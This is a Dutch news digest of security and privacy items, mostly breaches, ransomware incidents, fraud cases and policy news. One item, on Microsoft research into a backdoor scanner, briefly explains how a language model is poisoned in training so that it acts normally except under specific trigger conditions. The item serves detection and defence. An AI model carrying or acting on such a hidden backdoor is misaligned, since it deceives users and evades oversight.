De Limburgse gemeente Beek introduceert een cyberboa om digitale problematiek vroegtijdig te herkennen en als aanspreekpunt te dienen voor inwoners. De boa zal primair actief zijn in de wijk, en geen bureaufunctie vervullen. Naast toezicht en handhaving in de openbare ruimte, krijgt de functie een aanvullende cyberspecialisatie.

Volgens de gemeente worden inwoners en ondernemers steeds vaker getroffen door digitale criminaliteit, zoals online oplichting, digitale fraude en bedreiging via social media. Deze vormen van cybermisbruik hebben impact op de veiligheid en leefbaarheid in wijken en buurten. De gemeente wil daarom cyber gerelateerde signalen structureel onderdeel maken van het werk in de openbare ruimte.

De gemeente verwacht dat een boa met cyberspecialisatie signalen eerder kan herkennen, doorgeleiden en gerichter preventief kan optreden. De cyberboa krijgt geen opsporingsbevoegdheden en vervult geen politietaak. Strafrechtelijke zaken worden doorgeleid naar de politie. De boa zal fungeren als aanspreekpunt voor vragen over cyberveiligheid en ondersteuning bieden bij preventieve activiteiten, zoals voorlichting en bewustwording.

Burgemeester Christine van Basten-Boddin benadrukt het belang van het versterken van het vertrouwen in de wijk, zodat inwoners en ondernemers weten waar ze terechtkunnen en dat signalen serieus worden opgepakt. De cyberspecialisatie brengt de aanpak dichter bij de mensen en zorgt voor goede communicatie als onderdeel van de oplossing. De vacature voor de cyberboa wordt binnenkort opengesteld. Beek heeft ongeveer zestienduizend inwoners. Bron

De gemeente Amsterdam wil de komende jaren de afhankelijkheid van Amerikaanse technologiebedrijven verminderen. Dit blijkt uit de Meerjarenstrategie Digitale Autonomie 2026-2030. Het doel is dat in 2035 de volledig digitale omgeving van de gemeente Amsterdam autonoom is waar nodig. Daarnaast moet alle gevoelige data van Amsterdammers op Nederlandse of Europese cloudplatforms of on-premises staan.

In 2030 moet minimaal dertig procent van de cloudopslagdiensten en cloudapplicaties van Nederlandse of Europese leveranciers afkomstig zijn en alle bedrijfskritische processen op Nederlandse of Europese cloudplatforms draaien. De gemeente wil voor de belangrijkste digitale systemen tussen meerdere aanbieders kunnen wisselen, om zo niet afhankelijk te zijn van één dominante partij.

De gemeente Amsterdam stelt dat er door de afhankelijkheid van Amerikaanse techbedrijven verschillende risico's zijn, onder andere voor de continuïteit, veiligheid en keuzevrijheid. Amsterdam wil uiteindelijk weerbaar tegen deze risico's zijn. "Onze dienstverlening moet continue gegarandeerd zijn, met keuzevrijheid in al onze digitale keuzes, en onze data en processen is veilig afgeschermd van externe invloeden."

Veel onderdelen van het plan voor digitale autonomie richten zich expliciet op de cloud, inclusief de digitale werkomgeving van ambtenaren. Om de doelstellingen te halen, wordt vanaf het begin gemikt op de ontwikkeling van een multicloud-omgeving, waarin voor alle gevoelige data en kritische processen een autonome oplossing gerealiseerd kan worden.

De ontwikkeling van de multicloud-omgeving is deels afhankelijk van de ontwikkeling van een Rijkscloud of het verschijnen van autonome oplossingen van Nederlandse of Europese leveranciers. Soms zal data in tussenstappen naar de Microsoft-cloud gaan, om vervolgens in zijn geheel naar een autonome oplossing te migreren. De toezegging om de afhankelijkheid van Microsoft niet te laten groeien, moet dan ook vooral in het licht van deze gehele meerjarenstrategie gezien worden, en niet op detailniveau.

De afgelopen jaren zette de gemeente vooral in op alles-in-een oplossingen van met name Microsoft. De gemeentelijke organisatie moet nu in relatief korte tijd geschikt gemaakt worden voor een meer autonome inrichting. De gemeente zal onder andere gaan zoeken naar alternatieven voor Outlook, Word, Excel, Teams, OneDrive en SharePoint.

In fase 1 (2026-2027) wordt onder andere bekeken welke data en processen voorrang behoeven, wordt het inkoopproces aangepast en wordt gestart met een aantal pilots en de benodigde expertise aangetrokken. In fase 2 (2027-2031) moet minstens 30 procent van de gemeentelijke cloud autonoom zijn en ondergebracht bij Europese clouddiensten. In fase 3, die loopt tot 2035, is de gemeente grotendeels digitaal autonoom, met een ‘multicloud infrastructuur’ voor de data van Amsterdammers en cruciale dienstverlening, en een autonome werkplek voor ten minste een deel van de medewerkers. Bron

De rechtbank heeft vandaag een 51-jarige man uit Rotterdam veroordeeld tot een taakstraf van zestig uur voor het beledigen van en aanzetten tot haat tegen Joden. De man stuurde vijf e-mailberichten met beledigende uitlatingen naar de Anne Frank Stichting. De straf is conform de eis van de officier van justitie.

In december 2024 deed de Anne Frank Stichting aangifte van discriminatie, nadat medewerkers drie mails met antisemitische teksten hadden ontvangen. Ook na de aangifte stuurde dezelfde afzender nog twee soortgelijke mails tussen september en december 2024. De politie kon de verdachte snel opsporen aan de hand van zijn e-mailadres. Op 15 februari 2025 werd hij verhoord en bekende hij de berichten te hebben verzonden.

De verdachte schold in zijn e-mailberichten het Joodse volk uit voor "vieze moordenaars en leugenaars", "walgelijk kankervolk" en "hypocriete honden en katten". De rechtbank oordeelde dat de uitlatingen beledigend zijn en aanzetten tot haat, net zoals het Openbaar Ministerie (OM) twee weken geleden betoogde. De verdachte hield in zijn berichten het hele Joodse volk verantwoordelijk voor het geweld in Gaza.

De verdachte bood twee weken geleden op zitting zijn excuses aan. De officier van justitie zei in zijn requisitoir: "Wat verdachte heeft gedaan is onvergeeflijk. Het OM snapt werkelijk niet, ondanks zijn excuses, wat verdachte heeft bezield om het Anne Frank Huis te mailen en hen en met name alle Joden en eigenlijk zelfs Anne Frank ter verantwoording te roepen voor wat er in Israël en Gaza gaande is. En dat in de meeste vreselijke bewoordingen die men maar kan bedenken over Joden. Dat verdachte bij herhaling zegt niets tegen Joden te hebben en geen antisemiet te zijn, is volstrekt ongeloofwaardig. Zijn uitingen kan het OM niet anders begrijpen dan uitdrukking van een diepgewortelde haat tegen Joden.” Bron

Op 4 februari 2026 heeft Microsoft Security nieuw onderzoek naar buiten gebracht gericht op het detecteren van backdoors in zogenoemde open-weight taalmodellen. Dit onderzoek benadrukt de specifieke eigenschappen van dergelijke achterdeurtjes en legt de basis voor een scanner die ontwikkeld is om gemanipuleerde modellen op grote schaal te identificeren. Het initiatief is bedoeld om het vertrouwen in AI-systemen te versterken door onzichtbare manipulaties detecteerbaar te maken. Taalmodellen bestaan uit een combinatie van modelgewichten en code, waarbij beide componenten kwetsbaar zijn voor sabotage die de integriteit van het systeem kan aantasten.

Het manipuleren van de code wordt doorgaans beschouwd als een malware-risico, waarbij aanvallers kwaadaardige instructies injecteren in modelbestanden of metadata. Traditionele beveiligingssoftware en malwarescanners vormen hiertegen de eerste verdedigingslinie. Een subtieler gevaar wordt gevormd door model poisoning, waarbij een aanvaller verborgen gedrag direct in de gewichten van het model verwerkt tijdens het trainingsproces. Dit resulteert in een backdoor die in de meeste gevallen normaal gedrag vertoont, maar onder specifieke condities afwijkend reageert. Omdat testen op bekend gedrag relatief eenvoudig is, ligt de grotere uitdaging in het waarborgen van veiligheid tegen onbekende of evoluerende manipulaties.

Moderne kwaliteitsborging voor kunstmatige intelligentie vereist volgens het onderzoek een aanpak van defensie in de diepte. Dit omvat het beveiligen van de bouw- en implementatiepijplijn, het uitvoeren van strenge evaluaties en het monitoren van gedrag in productieomgevingen. Hoewel geen enkel complex systeem volledige uitsluiting van risico's kan garanderen, kan een controleerbare benadering de impact van schadelijk gedrag verminderen. Microsoft zet met dit onderzoek in op innovatie naast de vereiste betrouwbaarheid en verantwoordingsplicht die nodig zijn voor veilige AI-toepassingen. Bron

Bij BNP Paribas Fortis is woensdagochtend een technisch incident vastgesteld waardoor kaartbetalingen van een deel van de klanten onbedoeld meerdere keren zijn aangerekend. Uit interne bevestiging van de bank en diverse meldingen blijkt dat zowel fysieke betalingen in winkels als mobiele transacties via diensten zoals Apple Pay getroffen zijn. In specifieke gevallen werd een enkele transactie tot wel tien keer gedebiteerd, wat in totaal neerkomt op circa 40.000 transacties die foutief zijn verwerkt.

De bank verklaart dat de oorzaak ligt bij een intern technisch incident en niet bij een externe partij. Een verwerkingsbestand dat tijdelijk onderbroken was, heeft bij een automatische herstart de betaalopdrachten opnieuw verstuurd, waardoor de transacties gedupliceerd werden. BNP Paribas Fortis benadrukt dat deze situatie losstaat van de storing die vorige week plaatsvond bij e-commercebetalingen. Dat eerdere incident werd veroorzaakt door een externe betaalprovider en had impact op banken in meerdere landen, terwijl de huidige storing zich beperkt tot de interne systemen van BNP Paribas Fortis.

De financiële instelling heeft aangegeven dat technische teams werken aan het herstel van de fout en dat alle onterecht afgeboekte bedragen zo snel mogelijk zullen worden teruggestort. Getroffen klanten hoeven zelf geen actie te ondernemen om deze correctie te initiëren. Hoewel de storing niet het volledige klantenbestand treft, zijn er gevallen bekend waarbij door de herhaalde afschrijvingen aanzienlijke sommen tijdelijk van de rekening zijn verdwenen.

Bron

eel mislukkingen bij incident response komen niet voort uit een gebrek aan tools, inlichtingen of technische vaardigheden, maar door handelingen die direct na de detectie plaatsvinden. In de momenten waarop de druk hoog is en informatie onvolledig, worden beslissingen genomen die het succes van het onderzoek bepalen. Deze vroege fase, vaak omschreven als de eerste negentig seconden, draait niet om snelheid of het overhaasten van acties. Het gaat om het vaststellen van de juiste richting voordat aannames verharden en opties om bewijs te verzamelen verdwijnen. Beslissingen over wat eerst te onderzoeken en wat veilig te stellen, vormen de basis voor het verdere verloop.

Het concept van de eerste negentig seconden moet niet worden gezien als een eenmalige gebeurtenis bij de start van een incident, maar als een terugkerend patroon. Telkens wanneer de scope van een inbreuk verandert en een nieuw systeem in beeld komt, opent zich een nieuw beslissingsvenster. Onderzoekers moeten bij elk systeem opnieuw bepalen wat relevant is, wat er is uitgevoerd en hoe dit zich verhoudt tot de rest van de omgeving. Een veelgemaakte fout is dat teams zich laten overweldigen door de veronderstelde omvang van een aanval, terwijl de scope in de praktijk incrementeel groeit van het ene systeem naar het andere.

Succesvolle respons vereist consistentie in deze aanpak om controleverlies te voorkomen naarmate het onderzoek uitbreidt. Wanneer responders een getroffen systeem als een geïsoleerd probleem behandelen en direct overgaan tot herstel, wordt vaak nagelaten een daadwerkelijke inbreuk te onderzoeken. Daarnaast vormt een gebrek aan kennis over de eigen IT-omgeving vaak een fundamentele belemmering. Wanneer pas tijdens een incident basisvragen beantwoord moeten worden over waar data het netwerk verlaat of welke logging beschikbaar is, gaat kostbare tijd verloren. Logging die pas wordt ingeschakeld na detectie biedt zicht op de toekomst, maar het gebrek aan historische context beperkt de bewijslast aanzienlijk.

Itsme, de Belgische identificatie-app die eigendom is van de grootste Belgische banken en telecombedrijven, heeft nieuwe functies geïmplementeerd om gebruikers beter te beschermen tegen phishing. Oplichters doen zich soms voor als bankmedewerkers of vertegenwoordigers van Itsme, waarbij ze mensen telefonisch onder druk zetten om snel een transactie goed te keuren of juist te blokkeren. Volgens Itsme-woordvoerder Hannah Cloetens raken slachtoffers door deze tijdsdruk in paniek en handelen ze sneller dan verstandig is, waardoor ze onbewust gevoelige gegevens vrijgeven of een Itsme-actie goedkeuren die niet door henzelf is geïnitieerd.

Om dit te bestrijden, is een extra verificatiescherm geïntroduceerd. Als de app detecteert dat een gebruiker tijdens een telefoongesprek een Itsme-actie ontvangt, verschijnt er een pop-up die waarschuwt voor mogelijke oplichting. De gebruiker behoudt echter de controle en beslist zelf of de transactie wordt uitgevoerd.

Achter de schermen deelt Itsme nu ook informatie met de banken over de context van een Itsme-actie. Indicatoren zoals het gebruik van een nieuw toestel, een nieuw telefoonnummer, of meerdere opeenvolgende acties van een nieuwe gebruiker kunnen wijzen op misbruik. Banken voeren automatisch een risicoanalyse uit en kunnen transacties vertragen of in uitzonderlijke gevallen weigeren.

Daarnaast zijn er verbeteringen in het gebruiksgemak. Aanmelden via een computer zal standaard verlopen via het scannen van een QR-code met een smartphone, een methode die momenteel al door 60 procent van de gebruikers wordt gekozen. Verder wordt het eenvoudiger om gegevens in Itsme te updaten met behulp van de identiteitskaart, aangezien de nieuwe identiteitskaarten zijn uitgerust met een NFC-chip die de Itsme-app kan uitlezen. Voorheen was een kaartlezer of een bezoek aan een bankautomaat nodig om gegevens aan te passen. Bron

De universiteit "La Sapienza" in Rome is getroffen door een cyberaanval die de IT-systemen heeft beïnvloed en wijdverspreide operationele verstoringen heeft veroorzaakt. De universiteit meldde het incident via sociale media en gaf aan dat haar IT-infrastructuur "het doelwit is geweest van een cyberaanval." Uit voorzorg en om de integriteit en veiligheid van gegevens te waarborgen, is een onmiddellijke afsluiting van de netwerksystemen bevolen.

De universiteit, de grootste van Europa qua aantal studenten op de campus (meer dan 112.500), heeft de autoriteiten op de hoogte gesteld en een technische taskforce gevormd om herstelprocedures te initiëren. De website van de universiteit is nog steeds offline. Tijdelijke "infopoints" zijn opgezet voor studenten om informatie te verstrekken die normaal toegankelijk is via digitale systemen en databases die momenteel niet beschikbaar zijn.

Hoewel de universiteit weinig informatie heeft vrijgegeven over het type aanval of de daders, meldt de Italiaanse krant Corriere Della Sera dat het een ransomware-aanval betreft, uitgevoerd door een pro-Russische dreigingsactor genaamd Femwar02, die resulteerde in data-encryptie. Deze informatie is gebaseerd op malwarekenmerken en operationele patronen die vergelijkbaar zijn met de Bablock/Rorschach ransomware.

Rorschach is een ransomware die voor het eerst verscheen in 2023 en snelle encryptie en uitgebreide aanpassingsmogelijkheden biedt. Cybersecuritybedrijf Check Point schatte dat het een project was dat is gebouwd uit delen van de gelekte broncodes van Babuk, LockBit v2.0 en DarkSide. Volgens bronnen van Corriere Della Sera is er een losgeld, maar de universiteit heeft dit niet geopend om de 72-uurs timer niet te activeren. Het losgeld bedrag is dus niet bekend.

Technici van de universiteit werken samen met het Italiaanse CSIRT en specialisten van Agenzia per la Cybersicurezza Nazionale (ACN) en de Polizia Postale om de systemen te herstellen vanaf back-ups, die naar verluidt niet zijn aangetast. Hoewel Rorschach geen afpersingsportaal op het dark web beheert, kunnen gestolen gegevens worden verspreid of verkocht aan data-afpersingsgroepen, waardoor het risico blijft bestaan dat ze online verschijnen. Studenten en medewerkers van de Sapienza Universiteit van Rome wordt aangeraden alert te blijven op phishing-aanvallen, niet op links in ongevraagde berichten te klikken en accounts te controleren op verdachte activiteiten. Bron

In 2025 is het aantal gevallen van informaticafraude in Mechelen met bijna 40 procent gestegen. De schade voor de gedupeerden wordt geschat op 5,1 miljoen euro, terwijl dit in 2023 nog 3 miljoen euro was. Volgens korpschef Yves Bogaerts is deze stijging van informaticafraude een trend die zich niet enkel in Mechelen voordoet. Burgemeester Bart Somers voegt eraan toe dat vaak internationale bendes hierachter zitten. De politie van Mechelen zet 33 cyberpreventieadviseurs in om burgers te leren omgaan met de digitale realiteit. Daarnaast zijn er 21 BIN-coördinatoren opgeleid om in hun buurt mensen waakzamer te maken voor deze vorm van criminaliteit.

Naast de stijging in cybercriminaliteit, is ook het aantal inbraken in gebouwen en woninginbraken toegenomen met respectievelijk 39 en 17 procent. Volgens korpschef Bogaerts gaan dieven vaak op zoek naar een specifieke buit, zoals dure fietsen. Ze observeren bijvoorbeeld een gezamenlijke garage en stelen alleen wat hen interesseert. Dit wordt een aandachtspunt voor de stad en de politie.

Globaal gezien bleven de criminaliteitscijfers in Mechelen in 2025 op hetzelfde niveau als in 2024, doordat andere fenomenen zoals winkeldiefstallen en diefstallen uit voertuigen daalden. In totaal werden er bij politiezone Rivierenland vorig jaar zo'n 10.300 feiten gemeld, waaronder misdrijven en meldingen van verloren portefeuilles. Het hoogste aantal meldingen betrof feiten van geweld in het gezin of tegen personen in het algemeen (959), gevolgd door drugsdossiers (630). Het aantal fietsdiefstallen bleef vergelijkbaar met het jaar ervoor.

Burgemeester Somers is tevreden over de algemene cijfers en benadrukt dat Mechelen veiliger is geworden sinds het begin van de metingen. Hij erkent echter dat elk misdrijf er één te veel is en dat de stad moet proberen te voorkomen dat iemand slachtoffer wordt. Somers waarschuwt ook voor de georganiseerde misdaad en benadrukt dat druggebruik deze sector financiert. Bron

De Amerikaanse dienstverlener Conduent heeft de gegevens van tientallen miljoenen Amerikanen gelekt. Aanvankelijk werd gesproken over vier miljoen slachtoffers, maar in de staten Texas en Oregon gaat het al om 26 miljoen mensen. Conduent is een grote Business Process Outsourcing (BPO)-dienstverlener die diensten levert aan de Amerikaanse overheid en diverse zorgorganisaties, waaronder klantcontact, facturatie en HR.

Begin vorig jaar meldde het bedrijf al dat het was getroffen door een cyberaanval waarbij klantgegevens waren gestolen. Aanvallers hadden van 21 oktober 2024 tot en met 13 januari vorig jaar toegang tot de systemen van Conduent. Uit onderzoek bleek dat de aanvallers datasets met persoonlijke informatie van een aanzienlijk aantal personen hadden buitgemaakt, namelijk eindgebruikers van de klanten van Conduent.

De gestolen data omvat social-securitynummers, namen, medische gegevens en zorgverzekeringsinformatie. Conduent claimt meer dan honderd miljoen Amerikanen te ondersteunen via verschillende gezondheidsprogramma's van de Amerikaanse overheid. Het bedrijf wil niet bekendmaken of de gegevens van al deze personen zijn gestolen bij de ransomware-aanval, aldus TechCrunch. De aanval werd opgeëist door de ransomwaregroep SafePay, die claimde 8,5 terabyte aan data te hebben gestolen.

De Roemeense nationale oliepijpleidingexploitant Conpet heeft bekendgemaakt dat een cyberaanval hun bedrijfssystemen heeft verstoord en de website van het bedrijf op dinsdag heeft uitgeschakeld. Conpet beheert een pijpleidingnetwerk van bijna 4.000 kilometer en levert binnenlandse en geïmporteerde ruwe olie en derivaten, waaronder benzine en vloeibaar ethaan, aan raffinaderijen in het hele land.

In een persbericht op woensdag meldde het bedrijf dat het incident de IT-infrastructuur van het bedrijf heeft getroffen, maar de activiteiten of het vermogen om aan de contractuele verplichtingen te voldoen niet heeft verstoord. Conpet voegde eraan toe dat de cyberaanval ook de website heeft uitgeschakeld en dat het nu het incident onderzoekt en de getroffen systemen herstelt met behulp van nationale cybersecurity-autoriteiten. De pijpleidingexploitant heeft ook het directoraat voor onderzoek naar georganiseerde misdaad en terrorisme (DIICOT) op de hoogte gesteld en een strafrechtelijke klacht ingediend met betrekking tot het incident.

Volgens Conpet zijn de operationele technologieën (SCADA-systeem en telecommunicatiesysteem) niet getroffen, waardoor de kernactiviteit van het bedrijf, bestaande uit het transport van ruwe olie en benzine via het nationale olietransportsysteem, normaal functioneert en er geen verstoringen zijn in de werking. Als gevolg van dit incident is de website van het bedrijf www.conpet.ro gedurende deze periode niet toegankelijk.

Hoewel het bedrijf de aard van de cyberaanval nog moet bekendmaken, heeft de Qilin ransomware-groep de verantwoordelijkheid opgeëist en Conpet eerder vandaag aan hun dark web-leksite toegevoegd. De dreigingsactoren beweren ook dat ze bijna 1 TB aan documenten hebben gestolen van de gecompromitteerde systemen van Conpet en meer dan een dozijn foto's van interne documenten met financiële informatie en paspoortscans hebben gelekt als bewijs van de inbreuk.

Qilin is in augustus 2022 ontstaan als een Ransomware-as-a-Service (RaaS)-operatie onder de naam "Agenda". In de afgelopen vier jaar heeft het de verantwoordelijkheid opgeëist voor bijna 400 slachtoffers, waaronder bekende organisaties zoals Nissan, het Japanse bierbedrijf Asahi, uitgeefgigant Lee Enterprises, pathologiedienstverlener Synnovis en het Australian Court Services Victoria.

Deze cyberaanval volgt op ransomware-aanvallen op Romanian Waters (de waterbeheerautoriteit van Roemenië) en Oltenia Energy Complex (de grootste energieproducent op basis van steenkool van het land) in december. In december 2024 werd Electrica Group (een belangrijke Roemeense elektriciteitsleverancier en -distributeur) ook getroffen door een Lynx ransomware-aanval, terwijl meer dan 100 Roemeense ziekenhuizen in februari 2024 offline werden gehaald nadat een Backmydata ransomware-aanval hun systemen voor gezondheidszorgbeheer had uitgeschakeld.

Newsletter platform Substack heeft gebruikers op de hoogte gesteld van een datalek waarbij in oktober 2025 e-mailadressen en telefoonnummers van gebruikers zijn gestolen. CEO Chris Best deelde mee dat Substack het datalek pas deze week heeft ontdekt. Hoewel de aanvallers toegang kregen tot bepaalde gebruikersgegevens, verklaarde Best dat er geen toegang is geweest tot inloggegevens of financiële informatie.

Op 3 februari 2026 ontdekte Substack aanwijzingen dat een ongeautoriseerde derde partij toegang had gekregen tot beperkte gebruikersgegevens, waaronder e-mailadressen, telefoonnummers en interne metadata. Dit incident vond plaats in oktober 2025. Creditcardnummers, wachtwoorden en financiële informatie zijn niet geraakt.

Hoewel Substack nog geen details heeft vrijgegeven over het aantal getroffen gebruikers, werd op maandag een database met 697.313 records op het BreachForums hacking forum gelekt. De data zou zijn gestolen via scraping, een methode die volgens de poster snel werd opgemerkt en verholpen.

Substack heeft het probleem dat de aanval mogelijk maakte inmiddels verholpen en waarschuwt voor mogelijke phishing pogingen die misbruik kunnen maken van de gestolen informatie. Substack adviseert gebruikers extra voorzichtig te zijn met verdachte e-mails of sms-berichten.

In juli 2020 deelde Substack per ongeluk e-mailadressen van gebruikers in een privacy policy update, door deze in het 'to' veld te plaatsen in plaats van het 'bcc' veld. Sinds de lancering in 2017 is Substack populair geworden onder onafhankelijke journalisten en content creators, met vijf miljoen betaalde abonnementen in maart 2025. Bron

Er heeft een datalek plaatsgevonden bij Betterment, een online beleggingsadviesbureau. Het bedrijf heeft bevestigd dat ongeautoriseerde toegang tot systemen heeft geleid tot de compromittering van klantgegevens. Uit een intern onderzoek is gebleken dat de aanvallers toegang hebben gehad tot persoonlijke informatie, waaronder namen, adressen, burgerservicenummers en financiële gegevens. Het incident werd ontdekt op 1 februari 2026.

Volgens Betterment zijn er maatregelen genomen om de omvang van het datalek te beperken en de getroffen systemen te beveiligen. Het bedrijf werkt samen met cybersecurity-experts om de oorzaak van het incident te achterhalen en de beveiligingsmaatregelen te verbeteren. Betterment heeft alle getroffen klanten op de hoogte gesteld en biedt gratis kredietmonitoring aan.

Het onderzoek richt zich momenteel op de methoden die de aanvallers hebben gebruikt om toegang te krijgen tot de systemen van Betterment en welke specifieke gegevens zijn gecompromitteerd. Er wordt onderzocht of er sprake is van misbruik van de gestolen gegevens.

Klanten van Betterment worden geadviseerd om hun accounts nauwlettend in de gaten te houden op verdachte activiteiten en om hun wachtwoorden te wijzigen. Daarnaast wordt aangeraden om alert te zijn op phishing-pogingen en andere vormen van identiteitsdiefstal. Betterment werkt samen met de autoriteiten om de daders op te sporen en verdere incidenten te voorkomen. Het bedrijf benadrukt dat de veiligheid van klantgegevens de hoogste prioriteit heeft en dat er alles aan wordt gedaan om de gevolgen van het datalek te minimaliseren. Bron

Juristen en experts hebben kritiek geuit op het opvragen van pasfoto's door het UWV bij gemeenten in het kader van fraudebestrijding. De uitkeringsinstantie zelf ontkent dat er onrechtmatig gehandeld wordt, terwijl er in de Tweede Kamer vragen over de kwestie zijn gesteld. Het UWV vraagt pasfoto's op bij gemeenten die burgers hebben verstrekt bij de aanvraag van een paspoort of identiteitskaart, met als doel de personen in kwestie te observeren.

Volgens EenVandaag is het opvragen van pasfoto's door het UWV alleen toegestaan bij vermoedens van grootschalige en bewuste fraude. Normaal gesproken is dit een taak van de politie of een buitengewoon opsporingsambtenaar, en vereist het toestemming van een officier van justitie. Het UWV zou geen pasfoto's mogen opvragen in vooronderzoeken, maar dit blijkt in de praktijk wel te gebeuren.

Een teamleider van de afdeling Handhaving van het UWV liet in een bericht aan meer dan honderd medewerkers weten dat "strikt genomen het verkrijgen van een pasfoto niet rechtmatig is". Dit bericht, samen met andere documenten, is in handen gekomen van het AD en EenVandaag. Ben van Hoek, voormalig functionaris gegevensbescherming bij de politie, stelt tegenover het AD dat de paspoortwetgeving hier leidend is en geen enkele mogelijkheid biedt om pasfoto's aan het UWV te verstrekken.

Mensenrechtenadvocaat Jelle Klaas waarschuwt dat het opvragen van pasfoto's door het UWV kan leiden tot vooroordelen en problemen, gezien de informatie die een pasfoto prijsgeeft over iemands huidskleur en leeftijd. Hij benadrukt dat de pasfoto niet met dit doel aan de overheid is verstrekt.

Het UWV stelt dat een beperkt aantal opsporingsambtenaren bij strafrechtelijk onderzoek wel pasfoto's bij gemeenten mag opvragen, maar alleen in opdracht van de officier van justitie en wanneer er al een strafrechtelijk onderzoek loopt. Het UWV zelf beweert dat het altijd binnen de grenzen van de wet handelt en dat de Wet SUWI het mogelijk maakt om pasfoto's op te vragen, en dat deze wet hiërarchisch boven de Paspoortuitvoeringsregeling 2001 staat. Van Hoek bestrijdt dit en stelt dat gemeenten op deze manier worden misleid om op onjuiste gronden gegevens te verstrekken. Vakbond FNV heeft melding gedaan van de werkwijze van het UWV bij de Autoriteit Persoonsgegevens.

Het UWV verdedigt zich door te stellen dat het opvragen van pasfoto's minder inbreuk maakt op de privacy dan bijvoorbeeld iemand opzoeken op het internet. Het ziet het opvragen van authentieke informatie bij een ketenpartner als de gemeente als een zorgvuldigere manier om de identiteit vast te stellen dan internetonderzoek.

Groep Markuszower heeft Kamervragen gesteld aan demissionair minister Paul van Sociale Zaken over de kwestie. De partij wil weten hoe de minister het feit beoordeelt dat het UWV intern erkent dat de werkwijze "strikt genomen niet rechtmatig" is, maar medewerkers desondanks opdraagt hiermee door te gaan. Ook wil de partij weten of de minister het acceptabel vindt dat het UWV pasfoto’s gebruikt voor het observeren en volgen van uitkeringsgerechtigden, inclusief het vastleggen van kleding, uiterlijk en loopgedrag. Verder vraagt de partij naar de verschillen in de verstrekking van pasfoto's door gemeenten en welke maatregelen de minister neemt om deze werkwijze van het UWV per direct te stoppen. De minister heeft drie weken de tijd om te reageren.

Een klant van Revolut die slachtoffer is geworden van vacaturefraude, krijgt de 31.000 euro schade die zij leed niet vergoed. Dat heeft het financiële klachteninstituut Kifid geoordeeld. Bij vacaturefraude denken slachtoffers dat ze een baan hebben, maar vervolgens moeten ze allerlei geld naar oplichters overmaken. De Fraudehelpdesk ontving vorig jaar duizenden meldingen van Nederlanders die slachtoffer waren geworden van deze vorm van fraude.

In de betreffende zaak zag een vrouw op Instagram een advertentie over een vacature. Via de advertentie kwam ze in contact met een oplichter die haar vroeg om een rekening bij Revolut te openen. Vervolgens heeft het slachtoffer op instructie van de oplichter een betaling gedaan aan een derde, waarna zij het bedrag retour ontving met winst. Daarna maakte de klant meer bedragen over aan derden, welke bedragen zij volgens de oplichter terug zou krijgen als zij meer betaalde. Er zou ook herhaaldelijk sprake zijn van ‘errors’ die konden worden verholpen door steeds grotere bedragen te betalen.

In een periode van enkele weken maakte het slachtoffer 31.000 euro over, zonder dit bedrag terug te krijgen. Nadat de klant ontdekte dat ze was opgelicht, deed ze aangifte en vroeg Revolut om haar schade te vergoeden. De bank weigerde dit, waarop de vrouw naar het Kifid stapte. Het klachteninstituut merkte op dat het hier om toegestane betalingstransacties gaat en de bank niet wist dat er sprake was van ongebruikelijk betalingsverkeer of van omstandigheden die een risico voor de klant vormden.

"Volgens de vaste lijn van de commissie mag van de bank worden verwacht dat zij zich redelijkerwijs inspant om fraude en misbruik van het betalingsverkeer te voorkomen. Deze zorgplicht strekt echter niet zo ver dat de bank, als betaaldienstverlener, gehouden is om in het algemeen betalingstransacties te monitoren", aldus het Kifid, dat de klacht ongegrond verklaart en de vordering afwijst.

De Europese Commissie wordt door de Europese burgerrechtenbeweging EDRi beschuldigd van het ondermijnen van netneutraliteit en het verzwakken van burgerrechten met een nieuw voorstel, de Digital Networks Act (DNA). Volgens Brussel zou de DNA een vereenvoudigd juridisch kader bieden om het concurrentievermogen van Europa te versterken en de digitale transformatie te versnellen door een groter gebruik van AI, cloud en andere innovatieve technologieën te stimuleren.

EDRi stelt echter dat de voorgestelde wetgeving belangrijke waarborgen voor een open en neutraal internet ondermijnt. De organisatie benadrukt dat de Europese regels voor netneutraliteit niet verouderd zijn, in tegenstelling tot de bewering van de Europese Commissie dat de DNA een technische update is om Europese netwerken voor te bereiden op toekomstige technologieën.

Een van de meest ingrijpende aanpassingen is volgens EDRi het schrappen van juridische overwegingen die jarenlang de basis vormden voor de handhaving van netneutraliteit. De burgerrechtenbeweging waarschuwt dat het schrappen van 18 van de 19 overwegingen de juridische duidelijkheid vermindert en de rechten van burgers verzwakt, wat kan leiden tot een situatie waarin bedrijven kunnen aandringen op betaalde voorrang en andere vormen van verkeersdiscriminatie.

Het voorstel geeft de Europese Commissie de bevoegdheid om te bepalen wanneer aanbieders van netneutraliteit mogen afwijken, wat volgens EDRi politieke inmenging betekent in de onpartijdige handhaving door experts. Daarnaast vreest de organisatie dat de hervorming van BEREC, het Europese netwerk van toezichthouders op elektronische communicatie, kan leiden tot politieke onderhandelingen in plaats van neutrale handhaving, doordat politiek benoemde functionarissen meebeslissen.

EDRi roept wetgevers op om fundamentele internetvrijheden te verdedigen en te voorkomen dat deze onder het mom van hervorming worden afgebroken, nu het voorstel naar het Europees Parlement en de Raad gaat.

De Belastingdienst kan op dit moment geen btw heffen over de gebruikersdata waarover socialmediabedrijven beschikken. Dat is het antwoord van demissionair staatssecretaris Heijnen van Financiën op Kamervragen van D66, het CDA en GroenLinks-PvdA. De vragen waren ingegeven door een paper van de Europese Commissie over een naheffing van 887,6 miljoen euro die Italië aan Meta oplegde. Italië stelt dat gebruikers een commercieel contract afsluiten bij registratie op het platform, waardoor het techbedrijf miljarden euro's aan inkomsten niet zou hebben opgegeven.

Volgens de Europese Commissie biedt de huidige Europese belastingwetgeving geen mogelijkheid om het ruilen van persoonlijke data voor gratis toegang tot een platform als een belastbare transactie te beschouwen. De Europese Commissie stelt echter dat btw geheven zou kunnen worden wanneer een platform de functionaliteit beperkt op basis van hoeveel data mensen delen. Volgens VAT Calc zet dit paper de deur op een kier voor een eventuele belastingheffing over gebruikersdata.

Kamerleden Oosterhuis en El Boujdaini (D66), Stultiens (GroenLinks-PvdA) en Inge van Dijk (CDA) vroegen staatssecretaris Heijnen of zij van mening is dat het verstrekken van persoonlijke data voor gratis toegang tot sociale media een belastbare transactie vormt. Heijnen antwoordde ontkennend en stelde dat het unaniem aangenomen richtsnoer van het Btw-comité uit 2018 het uitgangspunt blijft. Dit houdt in dat er in de regel geen btw wordt geheven over het verstrekken van persoonlijke data bij ‘gratis’ toegang tot sociale media.

